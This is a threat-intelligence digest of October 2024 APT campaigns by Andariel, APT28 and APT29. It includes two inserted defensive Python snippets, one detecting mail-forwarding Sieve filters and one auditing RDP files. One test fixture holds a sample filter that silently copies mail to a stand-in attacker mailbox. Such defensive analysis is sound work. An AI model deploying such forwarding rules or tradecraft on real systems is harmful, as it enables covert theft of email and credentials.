APT Group Trends in October 2024

The following are the main APT groups and their cases, based on the analysis reports released by security companies and organizations in October 2024.

1. Andariel

Symantec’s Threat Hunter Team has found evidence that the Andariel group is launching financially motivated attacks against companies in the United States.

The group has continued its attacks even after the U.S. Department of Justice’s indictment in July 2024. In August, it attacked three U.S. companies. All of the victims were private companies, and the attacks are believed to have been carried out for financial gain.

The attack involved two unique credentials, including a fake “Tableau” certificate, as well as the Preft and Nukebot backdoors. The Preft backdoor downloads and uploads files, executes commands, and supports multiple plugins. The Nukebot backdoor, first observed in this attack, executes commands, transfers files, and takes screenshots. The attackers also used open-source and publicly available tools such as Sliver, Chisel, PuTTY, and Megatools. Two types of keyloggers were used: the first stole clipboard data and recorded keystrokes for specific programs, and the second recorded clipboard data in a randomly generated DAT file. The threat actors then used a malicious batch file to enable plaintext credential storage and extracted the credentials using Mimikatz.

According to Palo Alto Networks Unit 42, the Andariel group has moved away from its custom ransomware and is now using the Play ransomware’s infrastructure. The group is believed to be acting as an Initial Access Broker (IAB) or as a partner of the Play ransomware group.

These threat actors propagated Sliver and DTrack malware to multiple hosts via the SMB protocol. The Sliver beacon remained active until early September, after which the Play ransomware was executed. The Andariel group used secretsdump.py, the credential harvesting module of Impacket, to steal accounts.

Although the Play ransomware group has officially denied operating a RaaS model, it is possible that Andariel, acting as an IAB, sold the network access it had obtained. Andariel’s Sliver C2 server went offline immediately after the ransomware was distributed.

This incident marks the first official collaboration between the Andariel group and an underground ransomware network, suggesting that the North Korean group’s ransomware operations may expand in the future.

2. APT28

360 revealed that the APT28 group is launching attacks using malware such as Headlace and Masepie.

This attack mainly uses LNK files disguised as Windows updates or document icons to trigger the execution of BAT files through DLL hijacking. The group also employs geofencing to target systems in specific regions and increase the attack’s success rate.

The Headlace malware initiates the attack through a compressed archive that contains the CMD and BAT files which execute the final payload.

The Masepie malware uses a PowerShell script, together with a redirect page and an LNK file, to execute the malware and gain persistent control. Masepie collects system information and communicates with the C2 server to receive additional commands.

This multi-stage attack approach enhances the attack’s stealth and makes defense and response more difficult.

CERT-UA analyzed a phishing email attack that targeted a Ukrainian government agency, likely the work of the APT28 group.

The phishing email contains a link disguised as a Google spreadsheet. When the user clicks the link, a window that mimics reCAPTCHA appears. Clicking the “I’m not a robot” checkbox copies a PowerShell command to the clipboard. When the user runs the copied command in PowerShell, the browser.hta file and the Browser.ps1 script are downloaded and executed. The Browser.ps1 script establishes an SSH tunnel and exfiltrates browser authentication data and other information. It also downloads and executes Metasploit.

CERT-UA also analyzed another email attack that occurred in September 2024. This attack exploited the Roundcube vulnerability CVE-2023-43770 to steal user credentials and create a mail filter named SystemHealthCheck. This filter automatically forwards the victim’s email content to the threat actor’s email address.

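A defender-side check for the forwarding-filter technique described above, added here as an example and not taken from CERT-UA’s report: it scans a user’s Sieve filter script for redirect actions that send mail outside the organization and reports the rule name. The rule-name comment format, the sample script and the domain list are this example’s own assumptions.

```python
import re

# Constructed placeholder for the organization's own mail domains.
INTERNAL_DOMAINS = {"example.gov.invalid"}

def find_external_forwards(script, internal_domains=INTERNAL_DOMAINS):
    """Return (rule_name, target) for each redirect action whose target is
    outside internal_domains. Rule names are taken from the '# rule:[name]'
    comments that Roundcube's managesieve plugin writes before each rule
    (assumed format)."""
    findings = []
    rule_name = "<unnamed>"
    for line in script.splitlines():
        m = re.match(r"^\s*#\s*rule:\[(.*?)\]", line)
        if m:
            rule_name = m.group(1)
            continue
        # matches both 'redirect "addr";' and 'redirect :copy "addr";'
        for target in re.findall(r'\bredirect\s+(?::copy\s+)?"([^"]+)"', line):
            domain = target.rsplit("@", 1)[-1].lower()
            if domain not in internal_domains:
                findings.append((rule_name, target))
    return findings

# Constructed sample script: one benign filter, one unconditional copy to an
# external mailbox, and one internal forward that must not be flagged.
SAMPLE_SIEVE = """\
require ["fileinto","copy"];
# rule:[Tickets]
if header :contains "subject" "ticket"
{
    fileinto "Tickets";
}
# rule:[SystemHealthCheck]
if true
{
    redirect :copy "collector@attacker.invalid";
}
# rule:[Archive]
if address :is "from" "boss@example.gov.invalid"
{
    redirect "archive@example.gov.invalid";
}
"""
```

Running it over every mailbox’s active script (for example via the managesieve protocol) turns the filter into an alertable artifact rather than something discovered only after the forwarding has been going on for weeks.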
Both of these attacks used the same server as their C&C (command and control) infrastructure. Further analysis found that over 10 government email accounts had been compromised. The threat actors used these accounts not only to collect data but also to distribute malicious emails to defense-related organizations in other countries.

3. APT29

Microsoft Threat Intelligence has confirmed that the Russia-based threat group APT29 has been sending spear-phishing emails to government, defense, academic, and non-profit organizations in the UK, Europe, Australia, and Japan since October 22, 2024.

The threat actor sent malicious emails using stolen Microsoft or cloud service provider accounts.

In this attack, APT29 attached a signed Remote Desktop Protocol (RDP) configuration file; when the recipient opens it, the machine connects to a malicious server.

While this group has launched spear-phishing attacks against various organizations in the past, this is the first time it has attempted to gain access using an RDP file. The RDP file shares the victim’s local resources, such as files, network drives, peripherals, and web authentication credentials, with the attacker-controlled server. The threat actor can also install malware on the victim’s device to maintain access even after the session has ended.

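As an added example (not from the original report or Microsoft’s post), the following audits an .rdp attachment before it is opened: it parses the file’s name:type:value lines and lists the enabled settings that redirect local resources to the remote host. The setting names are real RDP-file keys; the explanations, the sample file, its host and its signature blob are constructed placeholders.

```python
import re

# Real .rdp keys whose enabled values hand local resources to the remote host;
# the explanations are this example's own wording.
RISKY_SETTINGS = {
    "drivestoredirect": "local drives mapped into the remote session",
    "redirectclipboard": "clipboard shared with the remote host",
    "redirectprinters": "printers shared with the remote host",
    "redirectsmartcards": "smart cards usable from the remote host",
    "devicestoredirect": "plug-and-play devices shared with the remote host",
    "usbdevicestoredirect": "USB devices shared with the remote host",
    "redirectwebauthn": "WebAuthn/passkey requests answered for the remote host",
    "remoteapplicationmode": "RemoteApp mode hides that a full session is open",
}

def parse_rdp(text):
    """Parse 'name:type:value' lines (type 's' = string, 'i' = integer)."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([^:]+):([si]):(.*)$", line)
        if m:
            settings[m.group(1).strip().lower()] = (m.group(2), m.group(3).strip())
    return settings

def is_enabled(typ, value):
    # integer flags are on when 1; string redirection lists are on when non-empty
    return value == "1" if typ == "i" else value != ""

def audit_rdp(text):
    """Return the target host, whether a signature is present, and the enabled
    settings that expose local resources to that host."""
    s = parse_rdp(text)
    findings = [(k, why) for k, why in RISKY_SETTINGS.items()
                if k in s and is_enabled(*s[k])]
    return {"host": s.get("full address", ("s", ""))[1],
            "signed": "signature" in s,
            "findings": findings}

# Constructed sample with a placeholder host and signature blob.
SAMPLE_RDP = """\
full address:s:desktop.contoso.invalid:3389
signature:s:PLACEHOLDER-SIGNATURE-BLOB
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectwebauthn:i:1
remoteapplicationmode:i:0
authentication level:i:2
"""
```

A signature only proves who issued the file, so `signed` is reported alongside the findings rather than treated as a reason to trust the connection.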
[1] https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion

[2] https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/

[3] https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247501024&idx=1&sn=d93b1d195596dcc3d5fb41ca18006dfe

[4] https://cert.gov.ua/article/6281123

[5] https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/